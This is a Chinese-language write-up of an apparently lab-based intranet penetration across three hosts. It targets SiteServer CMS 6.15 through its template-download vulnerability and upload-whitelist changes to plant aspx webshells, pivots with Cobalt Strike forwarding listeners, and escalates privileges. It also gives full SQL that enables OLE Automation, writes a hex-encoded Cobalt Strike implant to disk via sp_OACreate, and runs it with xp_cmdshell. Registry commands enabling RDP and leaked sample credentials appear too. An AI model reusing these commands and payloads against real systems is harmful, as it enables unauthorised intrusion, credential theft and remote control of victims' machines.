尝试连接3389发现没开，cmd下启动：

run REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f //开启远程桌面

利用抓到的普通用户明文上了远程桌面读取到了后台账号密码：administrator/8B..123admin，尝试内网横向

扫描存活指向第二台135主机，利用CS开了socket代理进内网

No2

2.1getshell-1

端口扫描发现开放8000端口利用前面浏览器抓到的密码成功登进后台，siteserver cms版本6.15翻了一下漏洞尝试利用模板下载漏洞getshell

跑C#程序得到加密后的downloadUrl值然后放入路径：

/Ajax/ajaxOtherService.aspx?type=SiteTemplateDownload&userKeyPrefix=test&downloadUrl=参数&directoryName=suce

不会显示下载成功，但是文件的确会进行自己解压

尝试访问webshell页面白色成功解析，利用蚁剑成功连接

2.2 getshell-2

木马构造同上

附件上传设置把zip，rar后缀添加白名单使得构造的自解压压缩包能上传上去

shell路径：/SiteFiles/SiteTemplates/压缩包名/shell名.aspx

2.3 getshell-3

上传设置添加aspx后缀白名单，内容管理上传图片会显示重命名后的文件路径

使用蚁剑连接即可

2.4 内网渗透

拿到权限之后命令执行发现不出网主机，准备利用第一台主机做跳板机转发上线

使用第一台上线的靶机做转发上线建立监听地址，注意IP地址选第二张网卡因为内网其他网段不通默认网卡

在做exe木马生成的之后选择分阶木马payload选择新建的转发监听器上传靶机执行上线

尝试提权的时候这里使用梼杌的插件只能连接到公网CS监听器，内网已控主机的监听器是不存在的，这时候可以使用ms16-075的exe启动木马得到system权限但有些麻烦，巨龙拉古插件内置了此功能

选择本地提权功能在弹出的窗口下执行木马即可获取system权限，尝试读取cms数据库配置文件

查看IP发现不在本地上存在双网站库分离环境，尝试开启socket服务利用Proxifier创建代理链

本地连接使用Navicat，MDUT工具mssql数据库

发现sa账号密码字段拿去解密付费后得到明文为QwE123asd，尝试sa用户利用MDUT登陆数据库，可以使用certutil编码转exe文件实现落地，这里尝试sp_oacreate组件落地

3. No3

3.1 文件落地

启用OLE组件：

exec master.dbo.sp_configure 'show advanced options', 1
RECONFIGURE
exec master.dbo.sp_configure 'Ole Automation Procedures', 1
RECONFIGURE

利用python转hex编码脚本把生成的马子转成hex，这里木马的生成和第二台主机一致均为转发上线这里不再阐述

把跑好后的hex编码放在OLE组件内并创建命令执行存储过程 命令：

DECLARE @DATAVARBINARY(MAX)= 0x-hex DECLARE @filepath VARCHAR(MAX)='C:\\Windows\\temp\\cs.exe'DECLARE @ObjectToken INTEXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUTEXEC sp_OASetProperty @ObjectToken,'Type',1EXEC sp_OAMethod @ObjectToken,'Open'EXEC sp_OAMethod @ObjectToken,'Write',NULL, @DATAEXEC sp_OAMethod @ObjectToken,'SaveToFile',NULL, @filepath,2EXEC sp_OAMethod @ObjectToken,'Close'EXEC sp_OADestroy @ObjectToken SELECT @filepath

但当我使用xp_cmdshell执行的时候提示拒绝访问，可能是权限太低了索性写到C:\Users\Public\Downloads\n.exe目录内，在调用cmd执行

成功上线CS命令：

exec master..xp_cmdshell "cmd /c C:\\Users\\Public\\Downloads\\n.exe"

处理提权的操作和第二台一致

成功拿下三台主机

为了贴近实战使用公网CS主机来打测试中代理链不稳可以使用Stowaway来搭多级代理。